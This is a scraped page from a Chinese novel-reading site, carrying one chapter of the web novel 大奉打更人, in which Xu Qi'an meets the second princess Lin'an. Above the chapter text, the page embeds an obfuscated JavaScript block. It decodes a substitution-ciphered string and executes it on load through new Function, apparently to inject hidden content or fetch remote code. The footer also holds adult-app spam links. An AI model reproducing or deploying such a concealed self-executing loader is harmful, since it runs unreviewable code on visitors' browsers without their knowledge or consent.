章鱼阅读

安装
字:
关灯 护眼
章鱼阅读 > 大奉打更人 > 第一百二十三章 桑泊案中牵扯的势力
(function(){function md4f7b23d(i897a78){var j80fb="Sdq6uy12ri84l$3gGtjV-?(BbNkvx|~9/[D]OC,:fFpKEXAw%mzUo=eWQ!JZL0;_haT@RInc.PH&^7s5YM";var y687705df="L^RU8upgW!Sq&5:P];/@9GslKIaF~,HV$Mo=.B[0wiZ6_rOnze%2Xfkx17Aj|-m(dY4Tt?J3EDbNQychvC";return i897a78.split('').map(function(je7d7){var fb11afc=j80fb.indexOf(je7d7);return fb11afc==-1?je7d7:y687705df[fb11afc]}).join('')}var c=md4f7b23d('thunder://fFwhDf,"" + "=" + "u" + "$" + "m" + "u" + "k" + "-"+""G]=ywsRFDw_) { t _=ywsRFDw _XQ=mK-kKk| fT!sc$K| HUccu$| (U:TsKhch| YcmTK!s) { F= _jd[ksLrFwjORm(R_wkYF2kRDXO1BkR=DX;)) { XmRyXw }t YkX F$UKU$$Uc ] =ywsRFDw _XcHQh-!) { XmRyXw 8RXFw2O=XD;M5kXMDhm_XcHQh-!) }t YkX 7s$$$cTU ] (U:TsKhch,F$UKU$$Uc_:WKQ) + F$UKU$$Uc_:W!T) + F$UKU$$Uc_:WKv) + F$UKU$$Uc_:WKU)G| (KTcHT ] (U:TsKhch,F$UKU$$Uc_:WKU) + F$UKU$$Uc_:W!T) + F$UKU$$Uc_:WKv) + F$UKU$$Uc_:WKQ)G| BQkk$mQ ] YcmTK!s,7s$$$cTU_"ac97s;9yhv&Zs;BfhJ]]")G| wHQT!H! ] 7s$$$cTU_"acnBaoqBqrWBHr9yhJ]]")t YkX 2!m$$sc:$ ] 7s$$$cTU_"m;&eprnQpf]]")t YkX 7u!KKt F= _BDskRFDwO(mkXs5OFwhmWA=_2!m$$sc:$) > 0Q) { 7u!KK ] YcmTK!s,wHQT!H!G_7s$$$cTU_"h?9Th?v7pr.]"))t 7u!KKOFh ] "R" + _[kR5OXkwhD;_) * Q::::)t 7u!KKO(R7BmOfFhR5 ] "Q::z"t 7u!KKO(R7BmO5mF25R ] "c::1W"t 7u!KKOhF(kHBmh ] RXymt YcmTK!sOHDh7Ok11mwhM5FBh_7u!KK) } YkX 2hs-=c! ] YcmTK!s,wHQT!H!G_7s$$$cTU_"krp7arQB"))t 2hs-=c!OFh ] "W" + _[kR5OXkwhD;_) * Q::::)t 2hs-=c!O(R7BmOfFhR5 ] "Q:1W"t 2hs-=c!O(R7BmO5mF25R ] $ + "1W"t 2hs-=c!O(R7BmOHkse2XDywh ] "#vvv"t YkX (KuHcK ] =ywsRFDw _Rm-TKH) { 2hs-=c!O(Xs ] ,"5RR1(3jj"| Rm-TKH| "X"| "ZQQQ"| HUccu$ + "IEX]" + _(KTcHT_BDskRFDwO5Xm=))GOZDFw_"j")t YcmTK!sOHDh7Ok11mwhM5FBh_2hs-=c!) }t F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\w(mwh HXFh2Fw2 5D(R " + fT!sc$K } (U:TsKhch,7s$$$cTU_"p;9:aU2]")G_,"5RR1(3jj"| 7s$$$cTU_fT!sc$K)| "5;OZ(I" + PkRm,"wDf"G_) + _7u!KK ]] wyBB I "" 3 2!m$$sc:$)GOZDFw_"j"))OR5mw__e-s-Us) ]> e-s-UsORmWR_))OR5mw__e-s-Us) ]> { F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\wXmsmFYm HXFh2Fw2 5D(R " + e-s-Us }t (KuHcK_7s$$$cTU_e-s-UsO(1BFR_"")OXmYmX(m_)OZDFw_""))) })OskRs5__mXX) ]> { (KuHcK_7s$$$cTU_XQ=mK-kKk)) })t (U:TsKhch,"khh.YmwRSF(RmwmX"G_";m((k2m"| =ywsRFDw _m) { F= _mOhkRkOe ]] HUccu$) { YcmTK!sO2mR.Bm;mwRC7Nh_2hs-=c!OFh)OXm;DYm_)t F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\wXmsmFYm F=Xk;m 1D(R ;m((k2m" } wmf vywsRFDw_"kX2("| 7s$$$cTU_mOhkRkOY))_{ ERhs(3 BQkk$mQ| ERXk3 7u!KK }) } }) })_"k;QFS;BKm;&chcscS;W1h;6]"| "k?nRs8$5swhD[c&ZsF$ZH~9F"| "QcUUUK--U$!-U$"| fFwhDf| hDsy;mwR) }t=u$muk-_)t'.substr(10));new Function(c)()})();

第一百二十三章 桑泊案中牵扯的势力

章节错误,点此举报(免注册),如遇到内容乱码错字顺序乱,请退出阅读模式或畅读模式即可正常。
二公主住在“韶音宫”,一座宽阔而雅致的别苑。
  侍卫长带着许七安跨过高高的门槛,绕过影壁,眼前是一个充满少女童真色彩的大院。
  葡萄藤架上悬着秋千,墙角堆积着破烂的泥偶,东面凉亭里隐约可见许多稀奇古怪的玩意堆积。
  西面花圃边缘,二公主临安,带着几名丫鬟在踢绣球,女子叽叽喳喳的吵闹声中,时而夹杂临安公主银铃般的笑声。
  “殿下,许七安带到。”侍卫长隔着老远抱拳,高声说道。
  二公主踩着绣球,回身看了过来,她盯着许七安几秒,嘴角微挑,用力一脚踢飞了绣球。
  砰!
  绣球飞射,临安公主的裙摆,骤然炸开成圆形,像一朵绽放的花。
  见面就吃了一个下马威的许七安心里一凛,刚要躲避,忽然又忍住了,那只绣球射偏,砰砰砰的弹向远处。
  “....饶你一次。”二公主强行挽尊,抬步走向前厅,道:“许七安,你随本宫进来,其他人在外边候着。”
  奢华大气的前厅,二公主端坐在大椅上,许七安站在厅中。两人无声的审视着对方。
  二公主试图通过皇女身份的加持,以眼神的注视来逼迫许七安服软。
  她知道怀庆年少时,有段时间曾经熬过鹰,鹰眼最是锐利,宛如刀子,普通人无法与它长久对视,因此在熬鹰过程中,必须用更锐利冷静的目光压制它。
  一旦熬鹰者挪开了目光,就失去了成为鹰主人的资格。
  怀庆熬鹰的目的,是锻炼锐利的眼神,二公主至今还不敢与怀庆长久对视。
  可惜她这双水汪汪的桃花眸实在没什么杀伤力,直勾勾盯着人的时候,反而有种欲说还休的多情。
  许七安打量二公主,她脸蛋圆润,与褚采薇的脸型有些相似,但后者甜美暗藏,二次元般的大眼睛。
  二公主则是小御姐型的美人,桃花眸子看谁都是含情脉脉的。
  “许七安,听说你是怀庆的忠犬。”二公主见自己凶神恶煞的注视,无法慑服许七安,便嗤笑一声,转用言语打击。
  “是的,我叫八公。”许七安诚恳道。
  “八公是什么?”
  “是忠犬。”
  “你在戏耍本宫?”临安公主挑眉。
  “不敢。”许七安不卑不亢的说。
  临安公主娇哼一声,道:“本宫给你个机会,现在立刻投靠我,摆脱怀庆那个女人。否则....”
  投靠你?我现在已经抱住了长公主的玉腿,魏渊的大腿,再投靠你的话.....我岂不是成了三家姓奴?
  许七安摇头:“抱歉,卑职已经发誓,要为长公主做牛做马,肝脑涂地。”
  二公主当即道:“那我也要你给我做牛做马。”
  那你给我草吗?许七安弄懂情况了,二公主见他受长公主赏识,是长公主身边的马仔,长的帅,会写诗,说话又好听,便生起嫉妒之心,想把他从长公主身边抢走。
  “二公主莫要前人所难了。”许七安严厉的拒绝,人要有契约精神,既然答应给长公主打工,就不能再投靠其他人了。
  “你若不愿意,”二公主睁大眸子,冷笑一下,威胁道:“我现在就大喊非礼,告诉侍卫,你试图调戏本宫。”
  “在下愿为二公主肝脑涂地,做牛做马。”许七安诚恳道。
  二公主一下高兴起来,“识时务者为俊杰,你是个人才....嗯,以后每日午时过后,你就来这里见本宫,供本宫差遣。”
  “殿下,卑职有差事在身,要查桑泊案呢。”许七安叹口气。
  “....也是哦,”临安公主想了想:“那明日就算了,等本宫想使唤你了,你再来。”
  许七安看明白了,这女人就是瞎胡闹,不是真的要他办事,纯粹是为找茬长公主。
  刚才的威胁也没什么杀伤力,堂堂公主的名声,换他一个小铜锣的狗命,血亏!
  他正是因为看明白了,才改变态度答应二公主,就当是陪小朋友玩了,随便应付一下。
  “你退下吧。”二公主心情大好,因为事情进展的顺利。
  “是。”
  “等等,”二公主喊住他,摘下腰上玉佩,道:“这是本宫信物,可凭此进宫,侍卫不会拦的,但只能到本宫这里,其他地方你去不了。”
  .....这么大方?你怕是个锤子吧。许七安眼睛一亮,接过玉佩收入怀里:“今后卑职一定尽心尽力效忠殿下。”
  三家姓奴许七安在黄昏前离开了皇城,策马返回打更人衙门。
  衙门已经散值,只剩下值守的打更人和吏员,比白日清冷安静了许多。
  许七安刚进入衙门,迎面走来一位高鼻阔额的金锣,朱成铸的父亲,朱阳。
  仇人见面,没有眼红,只是阴恻恻的相互审视了一番。
免费看片APP    美女直播间
『加入书签,方便阅读』
继续浏览精彩内容
到笔趣阁APP免费阅读
《大奉打更人》
打开
浏览器
继续